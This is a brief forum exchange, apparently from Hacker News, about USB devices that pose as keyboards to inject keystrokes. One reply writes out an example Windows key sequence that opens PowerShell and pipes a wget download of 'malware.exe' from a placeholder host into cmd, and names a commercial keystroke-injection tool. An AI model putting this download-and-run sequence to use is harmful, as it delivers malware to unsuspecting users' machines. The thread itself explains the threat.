"it’s USB so it can also suddenly change into a keyboard and inject keystrokes to steal your files and upload them "

▲ rcarmo 8 hours ago | parent [-]

And exactly how would it be able to achieve that?

	▲	aaronmdjones 8 hours ago \| parent [-]
		Malicious USB dongles capable of achieving this have been demonstrated before. For example, a Windows-targetting variant injects the keyboard sequence `Super+R (Sleep for 1 second) powershell.exe (Enter) (Sleep for 1 second) wget http://example.net/malware.exe \| cmd (Enter)` For example, a Rubber Ducky [1] can trivially be configured to accomplish this with the included tooling in under 5 minutes. [1] https://shop.hak5.org/products/usb-rubber-ducky